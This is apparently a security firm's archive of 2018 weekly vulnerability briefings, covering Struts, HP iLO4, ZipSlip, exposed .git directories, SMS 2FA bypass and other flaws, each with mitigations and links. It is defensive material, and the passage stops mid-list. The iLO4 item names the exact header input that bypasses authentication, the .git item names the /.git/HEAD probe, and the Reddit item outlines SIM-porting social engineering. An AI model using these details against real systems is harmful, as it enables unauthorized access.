Knowledge, experience, and the appropriate hardware tool set to update the system BIOS to disable memory overwrites.

These hurdles are surmountable, yet the additional requirement to disable memory overwrites is currently obscure.

In limited cases, F-Secure’s researchers were unable to execute the updated Cold Boot attack. The researchers identified that the most recent Apple computers were currently unaffected by their research, as those machines carry an Apple T2 chip, which places encryption keys in a “secure enclave.”

Recommendations
In most cases there are some simple opportunities to thwart the updated Cold Boot attack introduced by F-Secure’s researchers.  These opportunities include:

  • Train employees to power off or hibernate, rather than sleep, their computers. Consider using group policy to enforce this behavior across all computers belonging the the organization.
  • Proper physical security of computers: computers in public or semi-public (such as a laptop in a hotel room), should never be left “out in the open” or unattended.  They should remain with the owner or physically secured in a manner that would prevent tampering (such as being placed in a safe, in the case of a hotel room)
  • Improved FDE implementations: Adoption of robust Bitlocker PINs, entered at time of boot to unlock FDE, can significantly thwart Cold Boot attacks.  In the case where the encryption keys are recovered, the user password would still be required to decrypt.

Additional Resources
“Security flaw in ‘nearly all’ modern PCs and Macs exposes encrypted data” (TechCrunch)
https://techcrunch.com/2018/09/12/security-flaw-in-nearly-all-modern-pcs-and-macs-leaks-encrypted-data

“New modification of the old cold boot attack leaves most systems vulnerable” (Ars Technica)
https://arstechnica.com/gadgets/2018/09/cold-boot-attacks-given-new-life-with-firmware-attack/

The Chilling Reality of Cold Boot Attacks (F-Secure)
https://blog.f-secure.com/cold-boot-attacks/

TCG Platform Reset Attack Mitigation Specification (Trusted Computing Group)
https://trustedcomputinggroup.org/wp-content/uploads/Platform-Reset-Attack-Mitigation-Specification.pdf

InGuardians Resources and Events
The popular, actionable and insightful piece, “12 Things I Learned the Hard Way about Being a Project Manager in Infosec, by InGuardians’ Director of Operations Suzanne Pereira, contains lessons and reminders on how to manage projects, by focusing on people, communication and advocacy. Read more:  https://www.linkedin.com/pulse/12-things-i-learned-hard-way-being-project-manager-infosec-pereira/

Get some serious RF/Wireless kung fu training from InGuardians Director of Research Larry Pesce at SANS in Las Vegas, Sept 23 – 28, 2018.
https://www.sans.org/event/network-security-2018/course/wireless-penetration-testing-ethical-hacking

Dive deep into ICS Security with hands-on training from Justin Searle, our Director of ICS Security at SANS Las Vegas, Sept 23 – 27, 2018.
https://www.sans.org/event/network-security-2018/course/ics-scada-cyber-security-essentials

09/10/2018 Over 400k websites expose sensitive data via .git/ directory

Issue
Speed + Complexity => Errors => Vulnerability.  Your system is probably exposed.
Every week we try to focus on a relevant vulnerability to describe the issue in terms of client exposure. We point to information resources and mitigation strategies to improve security posture and vulnerability detection. This week, InGuardians’ editorial team had too many from which to choose. Here are but a few of the week’s disclosures:
–  NotPetya would have destroyed Maersk’s system if not for ONE server that had been offline due to a power outage.
–  IoT malware infecting aircraft SATCOM systems
–  Schneider controller vulnerability
–  British Airways data breach
–  mSpy’s second data breach
–  400,000 websites expose sensitive system development data via .git/ directories.
The real question then is, if you presume you are exposed, how do you detect and mitigate the risks?
In this weeks newsletter, we focus the .git/ directory exposure in particular.

Impact
Open .git directories can contain a great deal of sensitive information, including the web application’s structure, database passwords, API keys, development IDE settings, and more. Czech researcher Vladimir Smitka discovered over 390,000 websites, the majority .COM TLDs, that had internet-readable development directories.

The cause is in part an error in the queries many developers use to confirm that /.git is hidden. Querying a web server for /.git produces an HTTP 403 Error, which is a false negative. This error indicates that no index file exists in the directory (index.html, index.php, …) and that the directory is not auto-indexed. Smitka demonstrated that by querying for the /.git/HEAD file, he could determine that many web applications contained internet-readable .git/ directory contents.

Recommendations
Checking for visibility of a directory is good, provided it’s a valid check.  For the specific case of verifying directories, consider the ways to frame the query and what happens when URL and other queries fail; what is the error trap and error message? Are THOSE valid?

Developers and other staff are under pressure to create and deploy systems quickly – that’s not going to change. However the process must provide for thorough systems review and policy guidance to catch potential for failure early. In today’s multiple-releases-per-day DevOps modality, this will likely involve automating good checks as part of the build process.

These themes ran through the breaches and vulnerabilities discovered this week. Consider mSpy, a popular spyware tool for monitoring kids and others. Let’s take a leap of faith and say it’s used for GOOD THINGS, like ensuring the kids are home after school. The hacked database required no authentication. It revealed large amounts of broad categories of data, including Apple iCloud usernames and authentication tokens, Facebook posts, emails, credit card transactions, and more. So, the information from the mSpy breach could include the information necessary to access a company network.  Our mobile devices collect more than we may realize.

The general lesson is that a website error can lead to information leaks for internal disruption and for external leaks. The plethora of choices this week were not (necessarily) related, but EVERY week there is something. Every organization must continuously examine the security architecture to mitigate single points of failure and to prevent resident info on one victimized system from providing the keys for a successful pivot to domain controllers or the organization’s key networks. Mobile devices mean internal networks have more external connections than their architects may realize. It’s important to remember gadgets, BYOD mobile devices, and apps like mSpy when considering information technology’s footprint.

Additional Resources
“400,000 Websites Vulnerable through Exposed .git Directories” (SC Magazine)
https://www.scmagazine.com/home/news/400000-websites-vulnerable-through-exposed-git-directories/

“Open git Global Scan” (Vladimir Smitka)
https://smitka.me/

NotPetya analysis (Wired)
https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world

IoT Malware and SATCOM (Helpnet Security)
https://www.helpnetsecurity.com/2018/08/10/satcom-systems-security/

Schneider Electric Controller Vulnerability (Security Week)
https://www.securityweek.com/flaw-schneider-plc-allows-significant-disruption-ics

British Airways Data Breach (CNN Money)
https://money.cnn.com/2018/09/07/investing/ba-hack-british-airways/index.html

mSpy Mobile Spyware data breach (Krebs on Security)
https://krebsonsecurity.com/tag/mspy-breach/

InGuardians Resources and Events

The popular, actionable and insightful piece, “12 Things I Learned the Hard Way about Being a Project Manager in Infosec, by InGuardians’ Director of Operations Suzanne Pereira, contains lessons and reminders on how to manage projects, by focusing on people, communication and advocacy. Read more:  https://www.linkedin.com/pulse/12-things-i-learned-hard-way-being-project-manager-infosec-pereira/

 

Jay Beale, InGuardians Founder and CTO, will be speaking this weekend at ToorCon in San Diego.  His talk, “Hacking and Hardening Kubernetes” focuses on exploiting the technology’s weaknesses and then using its features to lock it down.  Track: Seminars, When: 9.14.18 at 16:00 PST. For more information: https://sandiego.toorcon.net/

InGuardians will sponsoring Idaho Falls’ first BSides event this weekend.  Stop by our booth and chat with our Head of Offensive Services and Idaho local, Tyler Robinson.  For more information: https://infosec-conferences.com/events-in-2018/bsides-idaho-falls/

08/28/2018 Apache Struts 2 RCE Vulnerability Affects Many Web Apps, including products from Aruba Networks, Cisco Systems, and NetApp

Issue
Last week, the Apache Struts team publicly announced a severe remote code execution security vulnerability in Apache Struts 2. Similar to the Strutshock vulnerability used in the 2017 Equifax breach, this vulnerability will allow an attacker to run programs of their choice on a web application that uses specific configurations or functionality. The Equifax 2018 breach is considered by many to be the worst corporate breach in US history, wherein bad actors stole personal information, including social security numbers, belonging to 147 million people in the US, or roughly 58% of the US adult population. This vulnerability is present in Apache Struts versions 2.3 – 2.3.34 or 2.5 – 2.5.16.

Applications are vulnerable if they either:

1) use results with no namespace, where its upper actions have no namespace or a wildcard namespace.
2) use a url tag without a value and action set.

Many vendors’ products use Apache Struts 2, in addition to organizations’ internally-developed applications, use Apache Struts 2 as detailed in the next section.

Impact
Many web applications and product web front end interfaces are potentially vulnerable. As Apache Struts 2 is a “middleware” web application framework, organizations may not realize that they have web applications susceptiblevulnerable to this vulnerability.  Several vendors have already determined that their products are vulnerable, including Aruba Networks, whose announcement covers its ClearPass servers, Cisco Systems, whose announced 4four vulnerable products, and NetApp, who announced 82 vulnerable products.

Vulnerable products and web applications will allow an attacker full remote control of the host. This canmay  lead to organizational compromise, ransomware attack, or crypto-mining activity, whether on a small scale or through automated worm programs.

Recommendations
As this vulnerability was discovered in April, with some likelihood of independent discovery or leak before patches came available four months later in August, it is especially important to correct vulnerable applications quickly. Staff can accomplish implement the correction by upgrading the Apache Struts 2 framework to either versions 2.3.35 or 2.5.17. If the vulnerable application is provided by a vendor, InGuardians recommends seeking out the vendor’s advisory for corrective action.Additional Resources
Apache Struts Security Bulletin”Semmle Discovers Critical Remote Code Execution Vulnerability in Apache Struts (CVE-2018-11776)” (Semmle Blog)
https://semmle.com/news/apache-struts-CVE-2018-11776

Aruba Networks ClearPass Policy Manager Security Advisory ARUBA-PSA-2018-005
https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2018-005.txt

Apache Struts Remote Code Execution Vulnerability Affecting Cisco Products: August 2018
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts#vulnerable

NetApp Security Advisory NTAP-20180822-0001
https://security.netapp.com/advisory/ntap-20180822-0001/

Three Public Exploits Posted
https://github.com/rapid7/metasploit-framework/issues/10524

Nessus Plugin 112064 (Checks for Vulnerability)
https://www.tenable.com/plugins/nessus/112064

CVE 2018-11776
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776

08/20/2018 VIA C3 CPUs Allow Unauthenticated Code Execution

Issue
VIA C3 CPUs allow unauthenticated code execution, granting an attacker elevated privileges.  A new tool named project:rosenbridge exploits a backdoor on VIA C3 CPUs.  The C3 chips are found primarily on embedded x86 devices such as: point-of-sale machines, automated teller machines (ATM’s), healthcare hardware, industrial automation devices, and a limited percentage of desktops and laptops.  The chip is a small non-x86 core embedded alongside the x86 main processor.  The “backdoor” in the C3 provides access to debug mode, which should require elevated kernel access to access.  Researchers discovered that unauthenticated access to the backdoor is occasionally enabled by default.  Thus far, neither researchers nor VIA have named which devices shipped with the backdoor on by default.  This exposure allows any unprivileged code to modify the kernel of the operating system.

Impact
Impact level of this exposure is high, as it is a remote code execution vulnerability for which there currently are no patches and few workarounds.  Exposure of healthcare devices, ATMs, and industrial automation devices should be taken very seriously.

Recommendations
InGuardians recommends that your organization identify your deployed hardware to determine which machines are affected by this flaw.  Once investigation is complete, enumerate the Windows Active Directory machine accounts corresponding to the affected devices. Each of these machine accounts must have a strong password.  The affected machines must be segregated from the enterprise network with strong network access control. If segregation is not possible, then permit access to the devices on a case-by-case basis, using a white list approach until the a patch is released or the devices reach the end of their life cycle.

Additional Resources

VIA C3 processors (VIA Manufacturer Product Page)
https://www.viatech.com/en/silicon/legacy/processors/c3/

Project:rosenbridge (GitHub project page, Christopher Domas)
https://github.com/xoreaxeaxeax/rosenbridge

08/14/2018 Princeton researchers warn home IoT devices could cause serious issues for utilities
Issue
This week, a team of researchers from Princeton University will be presenting their research on home Internet of Things (IoT) devices at the USENIX conference in Baltimore, MD.  They used the grid software packages MATPOWER and Power World to run simulations to determine how many devices, each using how much power, would be required to negatively impact the power grid.  In this case, they based their model on a small Polish power grid from 2008.  They discovered that they could create a “cascading blackout” of 86% of the power grid by arbitrarily and unexpectedly increasing the power demands by only 1%. The researchers were able to cause this increase with a botnet containing as few as 42,000 compromised IoT water heaters.
Impact
This awareness has just recently come out of the research phase and there is no current indication of a botnet made up of compromised water heaters.  However, given the history of IoT botnets and their negative impacts, such as with the Mirai botnet in October of 2016, this type of research should be considered an early warning.  In the past, refrigerators,, DVRs, smart TVs, and a whole host of other home IoT devices have been found to be a part of malicious botnets with hundreds of thousands of devices which have caused network outages via distributed denials of service (DDoS) attacks.Utility companies employ experts who predict the level of power requirements and configure generative devices accordingly.  However, this type of attack on the demand side of the equation, involving large home appliances such as water heaters and air conditioners, could hit unexpectedly.
Recommendations
For the consumer, vigilance, and isolation of home IoT devices is key.  Identify IoT devices on your networks, and put in controls and audit measures in order to prevent and detec abuse.  While there are standards in place for devices deployed by the utility companies, such a smart meters, there are currently no secure deployment standards for devices deployed by the homeowner.  InGuardians believes a standard, as such, should be created and a working group assembled to ensure that the risk of these home IoT devices are mitigated.Additional Resources
“A Quick History of IoT Botnets” (Radware)
https://blog.radware.com/uncategorized/2018/03/history-of-iot-botnets/“Mirai (Malware) [Botnet]” (Wikipedia)
https://en.wikipedia.org/wiki/Mirai_(malware)“How Hacked Water Heaters Could Trigger Mass Blackouts” (Wired)
https://www.wired.com/story/water-heaters-power-grid-hack-blackout/
08/08/2018 Reddit Hack Reveals Flaws in SMS Based Two-Factor Authentication

Issue
On June 19th, the popular community messaging site Reddit revealed that it had suffered a successful intrusion of several user accounts, cloud infrastructure, and source code.  Reddit revealed that the data access was read-only. The attacker was unable to modify any website content or user data.  Data accessed included database backups from 2005 to 2007, account credentials (with salted and hashed passwords, email addresses, and email digests (providing a link between e-mail addresses and account names).

The manner in which the attacker was able to gain access to Reddit’s systems is more troubling than this particular compromise of data.  Of the accounts accessed for Reddit’s systems, all claimed to have had Two Factor Authentication (2FA) enabled.  In this particular case the 2FA mechanism on these accounts was purported to have been a PIN delivered via SMS to a mobile device. Typically enabling 2FA is enough to protect these accounts, delivery of PINS via SMS can be compromised in at least two ways.  While we do not know the specific method employed by the attacker in this case the like attack vectors are:

  1. Creation of a rogue cellular tower signal, in order to lure the victim’s mobile devices.  Once connected to the rogue tower, the attacker could perform cellular traffic interception, acting as Man in the Middle (MiTM), ultimately allowing for the recovery of the SMS based PINs for the affected users.
  2. Social engineering the cellular provider customer support call center in order to port the victim’s phone number to a device under the control of the attacker.  This effectively delivers the SMS based PINs directly to the attacker.

While speculative, based on the level of effort for the two attack scenarios it is most likely that the number porting attack was utilized in this scenario.  InGuardians Operators have recently been made aware of similar type of attacks using number porting, however the basis was often to recover account credentials for cryptocurrency.

Impact
With a successful compromise of a users 2FA delivery method, through either number porting or rogue cellular tower, it is possible for an attacker to gain unfettered access to a victim network, applications and other credentials. As shown in this example with Reddit, the overall outcome can be quite severe, resulting in complete compromise of the organization.

While creating a rogue cellular tower is non-trivial, the number porting attack scenario is a more likely attack vector.  Taking only the boldness of the attacker to perform appropriate social engineering, this becomes a fairly low barrier to overcome.

Recommendations
As a result of more high profile attacks against 2FA utilizing SMS PIN delivery methods, organizations should carefully review and revise their stance on 2FA implementations.  At this time it is recommended that organizations move away from SMS based 2FA methods to those requiring hardware or software based tokens, in addition to passwords..

For those organizations looking to start 2FA implementations for either their users or customers, it is recommended to avoid the option of SMS based delivery and move right to hardware or software token based authentication, in addition to passwords.

While the adoption of hardware and software based tokens can be more expensive, and more obtrusive for the end user, the overall gain in security is much greater.

Additional Resources
Reddit: We had a security incident. Here’s what you need to know.
https://www.reddit.com/r/announcements/comments/93qnm5/we_had_a_security_incident_heres_what_you_need_to/

Reddit hack shows even strong security measures can be bypassed
https://www.cnbc.com/2018/08/01/reddit-hack-shows-even-strong-security-measures-can-be-bypassed.html

07/30/2018 Browsers Begin Marking Unencrypted Sites as “Not Secure”

Issue
The lack of HTTPS on a website has slowly become a sign that a company hosting a web application does not understand the impact of unencrypted traffic to their clients. As a result, browser companies have adopted increasingly conspicuous approaches to alert users to the basic risks of unencrypted websites. They have long warned users that entering credentials into an unencrypted page is dangerous. Last week, Google released Chrome 68, which marks unencrypted sites as “Not Secure” in the top URL bar. Mozilla added a similar (albeit a manually activated) feature in 2017 and might soon make it standard. Microsoft and Apple may follow suit.

Most criticism of unencrypted websites describe the risk of some nefarious group reading the web traffic or stealing passwords, but properly-configured HTTPS offers much more than just those protections. Users of properly configured HTTPS websites can be sure of three things:

  • Authentication: The content is provided by the entity they expect.
  • Integrity: The content has not been modified between the server and the browser.
  • Confidentiality: The content is safe from decryption by third parties.

The risk the first two points pose is not theoretical. Numerous countries route all web traffic through a single national proxy. University of Toronto researchers found that one of these national proxies added cryptocurrency mining code to unencrypted websites. Citizens and tourists alike executed this code.

The same report identified two other countries adding state-sponsored malware to unencrypted downloads. This places a company’s customers and traveling personnel (and ultimately the enterprise environment) at risk. Those who notice will point to the company as the culprit, suggesting that it was compromised since the malicious code appeared to come from its site.

Even some US internet service providers (ISPs) have injected content on unrelated sites, and some may still do so. ISPs Verizon, Comcast, and CMA Communications have all been previously identified as modifying traffic passing through their networks.

Impact
Ultimately, HTTPS sites will lose the green “Secure” indication as browsers consider it the norm. The currently “Not Secure” text could change to something more ominous. Within hours of the release, some prominent retailers had already implemented HTTPS by default to avoid the potential trust issues. This had likely been planned for some time–enabling HTTPS is often not trivial–but it demonstrated how seriously many companies take the change.

Recommendations
InGuardians recommends that all companies protect their websites and services with a properly-issued HTTPS certificate and updated encryption settings, including mandatory HTTPS. These measures protect your clients, employees, and other users not only from a threat agent obtaining information but also from modifying it in ways that may not be easily detected.

Deployment of HTTPS has become much easier and less expensive, as certificate authorities (CAs) have adopted new models to promote its use. Let’s Encrypt offers free certificates, and some certificate vendors offer wildcard certificates that can be used on an unlimited number of systems.

Additional Resources
Google Chrome 68 Release Notes (Jul 24, 2018)
https://support.google.com/chrome/a/answer/7679408?hl=en#68

BAD TRAFFIC: Sandvine’s PacketLogic Devices Used to Deploy Government Spyware in Turkey and Redirect Egyptian Users to Affiliate Ads? (Mar 9, 2018)
https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/

Verizon’s “supercookies” violated net neutrality transparency rule (Mar 7, 2016)
https://arstechnica.com/information-technology/2016/03/verizons-supercookies-violated-net-neutrality-transparency-rule/

Comcast Wi-Fi serving self-promotional ads via JavaScript injection (Sept 8, 2014)
https://arstechnica.com/tech-policy/2014/09/why-comcasts-javascript-ad-injections-threaten-security-net-neutrality/

Comcast is still forcing pop-up ads on customers to upsell its modems (Dec 11, 2018)
https://www.dailydot.com/debug/comcast-browser-pop-up/

How a banner ad for H&R Block appeared on apple.com—without Apple’s OK (Apr 7, 2013)
https://arstechnica.com/tech-policy/2013/04/how-a-banner-ad-for-hs-ok/

Qualys SSL Labs Server Test
https://www.ssllabs.com/ssltest/

Cipherli.st Strong Ciphers for Apache, nginx, and Lighttpd
https://cipherli.st/

Let’s Encrypt: Free Certificates
https://letsencrypt.org

07/25/2018 “Devil’s Ivy” Flaw Renders Millions of Internet of Things (IoT) Devices Vulnerable

Issue
An integer overflow in a library used by security cameras and many other Internet of Things (IoT) devices has been discovered and disclosed by security researchers at Senrio.  While the Senrio researchers demonstrated the exploit against one camera, an AXIS security camera, the vulnerable library, gSOAP by Genivia, is used by many IOT device manufacturers. It is present in 249 distinct Axis camera models alone.

Impact
The impact of this vulnerability is likely to grow in the coming weeks, as proof of concept exploits surface and additional vulnerable targets are identified.  Almost one year ago, a flaw in a security camera opened the way a botnet called Mirai botnet to take hold.  At its peak, Mirai compromised more than 600,000 IoT devices and sent distributed denial of service (DDoS) attacks in excess of 1.1 terabits per second, slowing or stopping Internet access for nearly the entire eastern United States for a part of a day.  At this time, there are at least thirteen (13) versions of Mirai active on the Internet.

While the Devil’s Ivy flaw has not yet resulted in a Mirai-style botnet, the announcement of the vulnerability gives us pause to think of the wide ranging consequences of vulnerabilities in widely-deployed devices.  Now is the time to identify the products using the gSOAP library, and check your networks for vulnerable devices.

Recommendations
At the time of this briefing, Axis Communications has not issued a patch for CVE-2017-9765.  Their main recommendation, which InGuardians will echo, is to restrict network access to and from the devices.

Network segmentation, along with controls and audit measures, are the first line of defense here.  This is a remote execution flaw that requires no authentication or credentials, merely network access.

Often times, IOT devices are ignored by organization’s security operations teams, because the devices are either externally managed or simply not managed at all.  It is imperative to identify the systems you have in place, and be sure to spell out ownership and maintenance in an IT governance plan.

IoT security differs in some aspects from traditional IT security as many of these devices provide little in the way of configuration and management.  InGuardians recommends adding IoT devices to your asset inventory, and including them in regular maintenance, and security audits.

Additional Resources
Devil’s Ivy: Flaw in Widely Used Third-party Code Impacts Millions (Senrio, July 18 2018)
https://blog.senr.io/blog/devils-ivy-flaw-in-widely-used-third-party-code-impacts-millions

Axis Communications Security Advisory for Devil’s Ivy
https://www.axis.com/files/faq/Advisory_ACV-128401.pdf

Genivia advisory for Devil’s Ivy Vulnerability in gSOAP:
https://www.genivia.com/advisory.html#Security_advisory:_CVE-2017-9765_bug_in_certain_versions_of_gSOAP_2.7_up_to_2.8.47_%28June_21,_2017%29

CVE Advisory for Devil’s Ivy:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9765

“Devil’s Ivy” Vulnerability Could Afflict Millions of IoT Devices (Wired, July 18, 2018)
https://www.wired.com/story/devils-ivy-iot-vulnerability/

How a Dorm Room Minecraft Scam [Mirai] Brought Down the Internet (Wired, December 13, 2017)
https://www.wired.com/story/mirai-botnet-minecraft-scam-brought-down-the-internet/

Wikipedia Article on Mirai
https://en.wikipedia.org/wiki/Mirai_(malware)

07/16/2018 HP iLO 4: Simple Authentication bypass can lead to system compromise.

Issue
In August of 2017 Hewlett Packard (HP) silently patched an authentication bypass vulnerability in their proprietary Integrated Lights Out (iLO) version 4.  iLO runs on a dedicated baseboard management controller on high end HP servers, to enable remote management even when the operating system itself cannot doesn’t function.  The vulnerability, present in versions prior to 2.54, is particularly concerning because of the criticality of the systems that many organizations utilize HP iLO4 to remotely manage.  These systems include those of the utmost importance in the organization, such as Windows Active Directory domain controllers.This authentication bypass is over a year old and received a CVSS score of 9.8 (out of 10) upon release.  However, it appears that many organizations have NOT patched their systems. Until just recently the researchers who discovered the flaw have been publicly speaking about it.  During recent presentations, it was disclosed that simply including a crafted HTTP host header to the iLO4 device including the phrase “Connection: “ followed by 29 “A” characters.  This simple attack grants full access to the iLO4 subsystem, allowing total control of the host system.  This includes the ability to gain access to the system console as the active user, mount additional file systems (such as various bootable penetration testing linux distributions), and the ability to reboot the hosts systems.

Recently InGuardians operators have successfully leveraged the HP iLO4 authentication bypass using the described scenario to gain full control of active directory where certain conditions were met.  While simple to exploit with tools such as curl under linux, several other PoC code releases, as well as a Metasploit module are available.

HP iLO3 and iLO5 are not affected, as well as iLO4 versions 2.54 and greater.

Impact
The impact of this vulnerability will differ based on the overall adoption, use cases, and policies concerning remote system management especially centered around the use of and of iLO4.  However, should the vulnerable version be in use, it is possible for an attacker to gain full control of an organization’s computing infrastructure, depending on the services hosted with iLO4 available.  In cases where lower privilege systems are managed with affected versions iLO4, it can merely provide an initial foothold for an attacker, likely leading to full compromise.

Recommendations
While remote management of systems is critical to effective IT operations, several things should be considered during its use to help protect the overall security of the environment:

PATCH: Add remote management solutions to the critical “short-list” for monitoring for and applying patches.
Evaluate the overall number of staff needed to conduct remote management and limit which systems can access the remote management interfaces through robust network segmentation and firewalling, potentially including the use of well secured jump hosts.
Limit systems in which the remote management can reach, especially for mounting remote filesystems.  Consider mounting of remote file systems from trusted sources, restricted by  robust network segmentation and firewalling.
Establish a policy for login sessions for remote access, specifically for remote terminal sessions.  In cases where privileged accounts can be left “logged in” indefinitely to a remote session, should an attacker access that same session, they gain all of the rights provided by the logged in user.  Set short timeouts for automatic logout for inactivity for remote sessions.

Additional Resources
HP iLO4 vulnerability:
https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_usA authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53:
https://nvd.nist.gov/vuln/detail/CVE-2017-12542

Subverting your server through its BMC: the HPE iLO4 case [Fabien Périgaud , Alexandre Gazet , and Joffrey Czarny]:
https://airbus-seclab.github.io/ilo/SSTIC2018-Article-subverting_your_server_through_its_bmc_the_hpe_ilo4_case-gazet_perigaud_czarny.pdf

07/09/2018 Google confirms external apps can scan and allow their staff to read your emails.

Issue
Google continues to allow outside software developers to “scan the inboxes of millions of Gmail users who signed up for email-based services offering shopping price comparisons, automated travel-itinerary planners or other tools.” (see WSJ report link below) Additionally, people who have connected third-party apps to their accounts may have unwittingly caused human staff permission to read messages those people considered private.Impact
All reports available to date suggest this is a common practice and not limited to Google. In June 2017, Google announced that it would allow users to opt out of its ad personalization via e-mail scanning. It seems that the company instead is allowing third party application developers do so both electronically (machine reading) and via human staff. Google has made statements assuring that these developers are vetted, but remains silent about any subsequent verification of their process.

Many organizations as well as individuals rely on Gmail and similar provider managed email services. This suggests that anything discussed in such emails is potentially exposed to apps and to the developers of those apps. It raises significant questions about the security of email exchanges and highlights the need for organizational policy and practice to mitigate loss of intellectual property and exposure of confidential information.

While that is not new, this is a new vector for exposure. Even if Google’s vetting is sound and developers adhere to reasonable security procedures, we know that data breaches of third parties is a common source of data exposure (see EXACTIS link below). It also raises a question about possible exposure of ANY hosted services. Reporting has limited discussion to Gmail and has been silent about whether or not G Suite “<person>@<company><dot>com“ emails are in the mix.

Recommendations
Review written policies for all external email communication among employees and to clients to ensure they proscribe discussion of sensitive information. Remind staff to remain vigilant about discussing business dealings in emails.

Review written policies to confirm that employees are not permitted to send sensitive organization data via free/consumer-level Gmail or other third-party email providers.

Additional Resources
Wall Street Journal article and report:
https://www.wsj.com/articles/techs-dirty-secret-the-app-developers-sifting-through-your-gmail-1530544442 

ArsTechnica: Scroogled no more: Gmail won’t scan e-mails for ads personalization
https://arstechnica.com/gadgets/2017/06/gmail-will-no-longer-scan-e-mails-for-ad-personalization/

Business Insider article and discussion:
http://www.businessinsider.com/google-allows-app-developers-to-read-peoples-gmails-report-2018-7 

Wired (UK) news article:
http://www.wired.co.uk/article/gmail-security-checkup-apps-data
(article is apparently NOT on the US *.com website)

Wired article about EXACTIS breach:
https://www.wired.com/story/exactis-database-leak-340-million-records/ 

ABC (Australia) article with a good guide to checking apps:
http://www.abc.net.au/news/2018-07-04/google-admits-it-allows-external-apps-to-access-user-data/9938556 

07/02/2018 New attacks against LTE networks
Issue
Three new attack vectors in the LTE (aka 4G) standard have been unveiled by  researchers from Ruhr-Universität Bochum and New York University Abu Dhabi.  These new vulnerabilities include two passive attacks that allow for identity mapping and website fingerprinting, and one active cryptographic attack called aLTEr.  The last would allow attackers to remotely redirect network connections via DNS spoofing.  The major issue with these new attack vectors is that the flaw is in the standard, which is ubiquitous in mobile communication, and therefore affects ALL devices using LTE.There are three main attack vectors:
Website fingerprinting – identify which sites that users in a radio cell are visiting
Identity mapping – identify individual users in the radio cell
aLTEr – abusing flaws in the standard to redirect network communications via DNS spoofing

Impact
The impact of aLTEr and its related attack vectors is large, with hundreds of millions of devices using the vulnerable standard.  Researchers worked with the GSM Association (GSMA) and 3rd Generation Partnership Program (3GPP) along with telephone companies to ensure that all parties responsible for addressing the problem were notified prior to the release of the paper.The three main attacks outlined in the paper (mapping user identities in the radio cell, identifying websites a user visited, and the alteration attack via DNS manipulation) currently require special equipment and knowledge to be performed,  but it will not be long before these attacks are going to show up in the wild.The long term impact will depend on whether the GSMA & the 3GPP will fix the current standard in addition to ensuring that it is fixed in the next generation of the standard (5G).

The impact on individuals is hard to quantify at the moment, but the potential impact to critical infrastructure is serious.  Many of our critical infrastructure systems rely on LTE communications, for example: smart grid relies heavily on  the use LTE networks to transmit data.

Recommendations
The main recommendation for the moment is to identify which parts of your business operations rely on LTE communications and ensure that your vendors are using strong encryption and authentication independent of the LTE layer.Additional Resources
Website for the attack research:
https://alter-attack.netAcademic paper on the research:
https://alter-attack.net/media/breaking_lte_on_layer_two.pdf

Hacker news article:
https://thehackernews.com/2018/06/4g-lte-network-hacking.html?m=1

06/26/2018 Attackers leverage cost of GDPR fines to extort businesses
Issue
In what appears to be an exploit of the concept of “the lesser of two evils”, hackers in Europe have began changing the approach of ransom based attacks. Two Bulgarian companies have recently had their data compromised, but instead of encrypting it and demanding that the victim pay up to get the data back, these attackers are threatening to make the data public. This would expose the company to risk of fines with Europe’s General Data Protection Regulation (GDPR) that went into effect in May.  These fines would be upward of 4% of annual revenue.The attackers, acutely aware of the potentially high cost of GDPR fines, typically ask for much less. At their highest, attackers are currently asking for the equivalent of €20,000.  This type of attack may be effective as GDPR is still relatively new, and businesses are still trying to grasp the risk of fines and levels of enforcement.Impact
A wrinkle in this scheme, is that the the GDPR requires companies to report a breach within 72 hours of becoming aware of it, or also face steep fines. As of today, if the company self-reports a breach, they are still liable for the 4% fine. These attacks force the victimized companies to consider the value of profit motive over full compliance with the law.
Recommendations
Due to the level of potential loss, and the possibility of running afoul of European law, companies subject to the GDPR should ensure that they do more than merely meet the minimum regulations of compliance dictated by GDPR. They also should apply defense-in-depth strategies and perform periodic penetration testing to ensure that their most sensitive data is protected in ways that are beyond reproach. Demonstrating that this due diligence has been performed is the only way to avoid a fine in the event of a reportable breach.
06/18/2018 ZipSlip: Vulnerabilities in compression archive file processing can lead to system compromise.

Issue

Researchers have demonstrated that multiple file archive extraction libraries, across multiple programming languages, allow an attacker-supplied archive to overwrite arbitrary paths on the filesystem.  In essence, a program using a vulnerable C#, Java, JavaScript, or Go library can unintentionally overwrite files on the machine with attacker-supplied content, granting the attacker remote code execution capability on the system. The file formats known to be affected include: ZIP, tar, jar, war, cpio, apk, rar and 7zip.

This is due to two major factors: vulnerable libraries and lack of centralized file archive extraction libraries. The vulnerable libraries span multiple languages. These include, but may not be limited to:

JavaScript NPM: Unzipper

JavaScript NPM: Admzip

Java: codehaus/plexus-archiver

Java: zeroturnaround/zt-zip

Java: zip4j

C# / .NET: DotNetZip.Semverd

C# / .NET: SharpCompress

C# / .NET: mholt/archiver

Java: java.util.zip

Java: commons-compress

C# / .NET: SharpZipLib

Ruby: zip-ruby

Ruby: rubyzip

Ruby: zipruby

Go: archive

The lack of centralized libraries for performing archive file extraction, leading to the development of hand-crafted methods.  These hand-crafted methods often do not feature robust error trapping routines to prevent extracted files from being written outside of the extraction path.  These hand-crafted code “snippets” are often shared publicly (through websites such as StackOverflow) and adopted across many projects.  With these three factors considered, many closed and open source projects are writing or have adopted vulnerable archive file extraction processing.  This issue can result in overwriting of sensitive system files with a malicious file archive, potentially resulting in remote code execution and full system compromise.

The researchers discovering this issue have identified a number of common applications that carry the vulnerability, including the Apache projects: Ant, Hadoop, Hive, Maven, and Storm.  A comprehensive list of these applications can be found at:

    https://github.com/snyk/zip-slip-vulnerability

Impact

The impact of this vulnerability will differ from environment to environment, depending on the various software packages deployed.  However, should an organization be utilizing one of the affected and identified applications, it is possible for a malicious actor to deliver a specifically-crafted archive file to a victim program, which can cause a full system compromise simply by extracting the file.  Because of the nature of the code sharing nature and the affected programming language deficiencies it is highly likely that this issue far exceeds the current identified scope.

Recommendations

Our recommendations fall into two separate categories:

Developers and Enterprise Development operations:

